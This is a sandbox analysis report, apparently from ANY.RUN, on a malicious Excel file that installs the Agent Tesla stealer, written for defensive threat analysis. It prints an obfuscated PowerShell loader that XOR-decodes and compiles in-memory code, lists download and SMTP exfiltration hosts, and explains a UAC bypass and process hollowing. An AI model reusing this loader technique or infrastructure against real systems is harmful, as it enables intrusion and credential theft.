File name: | 1dd4ac4925b58a2833b5c8969e7c5b5ff5ec590b376d520e6c0a114b941e2075.xls |
Full analysis: | https://app.any.run/tasks/f9743d7a-ed98-433a-bc20-b18a4f83d0a8 |
Verdict: | Malicious activity |
Threats: | Agent Tesla is a .NET-based spyware/information stealer that records keystrokes and other user interactions on the victim's machine. It is falsely marketed as legitimate monitoring software on the dedicated website where the malware is sold. In this run the stealer's network activity originates from RegSvcs.exe (PID 3532): an external-IP lookup against checkip.amazonaws.com followed by a connection to mail.sweeddehacklord.us on TCP/26, which is consistent with SMTP exfiltration of the collected data. |
Analysis date: | July 17, 2019, 13:25:13 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: v9b66, Subject: lf338, Last Saved By: USER, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jun 13 09:28:30 2019, Last Saved Time/Date: Thu Jun 13 09:37:23 2019, Security: 0 |
MD5: | 8E0B8B5200E879D7A4A62DF5EA30253A |
SHA1: | 50C9DEA7C3B2F396F22612F14DAE00880CEFFA9A |
SHA256: | 1DD4AC4925B58A2833B5C8969E7C5B5FF5EC590B376D520E6C0A114B941E2075 |
SSDEEP: | 6144:HY35qAOJl/YrLYz+WrNhZF+E+W2RnAaI6Kcx0oqvJI3uBjTOgoLLkAEwPlP:FcgIwjTOpP3LPl |
.xls | | | Microsoft Excel sheet (48) |
---|---|---|
.xls | | | Microsoft Excel sheet (alternate) (39.2) |
CompObjUserType: | Microsoft Office Excel 2003 Worksheet |
---|---|
CompObjUserTypeLen: | 38 |
HeadingPairs: |
|
TitleOfParts: |
|
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 12 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
ModifyDate: | 2019:06:13 08:37:23 |
CreateDate: | 2019:06:13 08:28:30 |
Software: | Microsoft Excel |
LastModifiedBy: | USER |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | lf338 |
Title: | v9b66 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2844 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
692 | powershell -WindowStyle Hidden function rf2d7d2 { param($s1a66c) $a84e86 = 'tf2825'; $d91ec = ''; for ($i = 0; $i -lt $s1a66c.length; $i+=2) { $x27f33d = [convert]::ToByte($s1a66c.Substring($i, 2), 16); $d91ec += [char]($x27f33d -bxor $a84e86[($i / 2) % $a84e86.length]); } return $d91ec; } $xbb45 = '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'; $xbb452 = rf2d7d2($xbb45); Add-Type -TypeDefinition $xbb452; [ye1fa]::pcb3a(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) — Note: the parent of this PowerShell instance is wmiprvse.exe, not EXCEL.EXE (PID 2844), which is consistent with the document launching it through WMI (e.g. Win32_Process.Create); detections that key on an Office-process → powershell.exe parent/child relationship will miss this chain. The command line decodes a hex string by XOR-ing each byte with the repeating key 'tf2825', compiles the decoded C# in-memory with Add-Type (hence the csc.exe and cvtres.exe children) and then invokes [ye1fa]::pcb3a(); the encoded payload was removed from this listing. | ||||
1692 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\kkz6tvaz.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
3212 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESF62A.tmp" "c:\Users\admin\AppData\Local\Temp\CSCF629.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) | ||||
2752 | "C:\Users\admin\AppData\Roaming\ofedf57.exe" | C:\Users\admin\AppData\Roaming\ofedf57.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2520 | "C:\Windows\System32\eventvwr.exe" | C:\Windows\System32\eventvwr.exe | — | ofedf57.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Event Viewer Snapin Launcher Exit code: 3221226540 Version: 6.1.7600.16385 (win7_rtm.090713-1255) — exit code 3221226540 is 0xC000042C (STATUS_ELEVATION_REQUIRED): this MEDIUM-integrity launch of eventvwr.exe did not elevate, whereas the next launch (PID 3456) runs at HIGH integrity. | ||||
3456 | "C:\Windows\System32\eventvwr.exe" | C:\Windows\System32\eventvwr.exe | ofedf57.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Event Viewer Snapin Launcher Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2372 | "C:\Users\admin\AppData\Roaming\ofedf57.exe" | C:\Users\admin\AppData\Roaming\ofedf57.exe | eventvwr.exe | |
User: admin Integrity Level: HIGH Exit code: 0 — the dropper is re-launched at HIGH integrity by the auto-elevated eventvwr.exe (PID 3456), i.e. a MEDIUM→HIGH escalation without a visible UAC prompt. This pattern matches the well-known eventvwr.exe UAC bypass (hijacking the HKCU mscfile shell\open\command handler), but the registry write itself is not shown in this report and should be confirmed from the full analysis. | ||||
3532 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe | ofedf57.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Microsoft .NET Services Installation Utility Version: 2.0.50727.5420 (Win7SP1.050727-5400) — RegSvcs.exe is a signed Microsoft .NET utility with no legitimate reason to query checkip.amazonaws.com or connect to a remote mail host; that it is the process generating this traffic (PID 3532 in the network tables) suggests the Agent Tesla payload was injected into it by ofedf57.exe (PID 2372), a hollowing technique commonly seen with this family. It also inherits the HIGH integrity level obtained above. |
PID | Process | Filename | Type | |
---|---|---|---|---|
2844 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRE8AC.tmp.cvr | — | |
MD5:— | SHA256:— | |||
692 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8BWEIQPYDPF15T6UC3I9.temp | — | |
MD5:— | SHA256:— | |||
1692 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSCF629.tmp | — | |
MD5:— | SHA256:— | |||
1692 | csc.exe | C:\Users\admin\AppData\Local\Temp\kkz6tvaz.pdb | — | |
MD5:— | SHA256:— | |||
3212 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RESF62A.tmp | — | |
MD5:— | SHA256:— | |||
1692 | csc.exe | C:\Users\admin\AppData\Local\Temp\kkz6tvaz.dll | — | |
MD5:— | SHA256:— | |||
1692 | csc.exe | C:\Users\admin\AppData\Local\Temp\kkz6tvaz.out | — | |
MD5:— | SHA256:— | |||
692 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF10f2be.TMP | binary | |
MD5:4B92A079D7F4DFA0DFE9125E60FE7814 | SHA256:E96B52BC25AE8BA162760C1F5159606ED78EB1EC4CBA0F98AAD2915AE22D8E04 | |||
692 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:4B92A079D7F4DFA0DFE9125E60FE7814 | SHA256:E96B52BC25AE8BA162760C1F5159606ED78EB1EC4CBA0F98AAD2915AE22D8E04 | |||
692 | powershell.exe | C:\Users\admin\AppData\Local\Temp\kkz6tvaz.cmdline | text | |
MD5:A983B3BB755E320B1FA98D4BA3055FA6 | SHA256:47EBB057277423F5B338FB266960D802C1806913C60E7D4EE4D4DC1C3FFCACFE |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
692 | powershell.exe | GET | 200 | 185.26.122.68:80 | http://sodimodisfrance.cf/5/sweed.exe | RU | executable | 1.46 Mb | malicious |
3532 | RegSvcs.exe | GET | 200 | 34.233.102.38:80 | http://checkip.amazonaws.com/ | US | text | 12 b | shared |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3532 | RegSvcs.exe | 198.54.125.61:26 | mail.sweeddehacklord.us | Namecheap, Inc. | US | malicious |
3532 | RegSvcs.exe | 34.233.102.38:80 | checkip.amazonaws.com | Amazon.com, Inc. | US | shared |
692 | powershell.exe | 185.26.122.68:80 | sodimodisfrance.cf | Hostland LTD | RU | suspicious |
Domain | IP | Reputation |
---|---|---|
sodimodisfrance.cf |
| malicious |
mail.sweeddehacklord.us |
| malicious |
dns.msftncsi.com |
| shared |
checkip.amazonaws.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET INFO DNS Query for Suspicious .cf Domain |
692 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
692 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3532 | RegSvcs.exe | A Network Trojan was detected | MALWARE [PTsecurity] AgentTesla IP Check |
Process | Message |
---|---|
csc.exe |
*** HR originated: -2147024774 (0x8007007A, ERROR_INSUFFICIENT_BUFFER — side-by-side/isolation noise emitted by csc.exe during the Add-Type compile; not an indicator of compromise on its own, the same message repeats below)
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|